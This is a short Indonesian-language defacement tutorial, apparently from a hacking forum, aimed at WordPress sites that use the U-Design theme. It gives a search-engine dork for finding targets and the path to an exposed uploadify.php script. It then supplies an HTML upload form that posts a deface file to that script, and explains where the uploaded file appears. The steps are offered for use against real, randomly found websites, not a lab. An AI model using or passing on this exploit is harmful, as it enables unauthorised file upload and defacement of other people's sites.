Dork : Inurl:/themes/u-design/
* Kembangkan Lagi Dork'Nya. *
Exploit : /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
Langsung Ke Tutorialnya Yak ;v
1. Masukan Dork Ke Search Engine .
2. Pilih Salah Satu Target Yang Ingin Di cRooTz xD
3. Masukan Exploitnya .
Contoh : localhost /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
Vuln ? Page Blank!
4. Lalu Copy CSRF Ini.
<form method="POST" action=" URL PAGE BLANK "
enctype="multipart/form-data"><input type="file" name="Filedata" />
<button>Upload?</button><br/>
</form>
Simpan Ex.HTML / HTM [All Files]
5. Dan Buka CSRF Tersebut , Lalu Upload File Deface Kamu .txt
Jika Berhasil Nanti Akan Muncul Angka "1"
6. Selesai , Letak File Deface ?
localhost /File-Deface.ext
Terima Kasih.
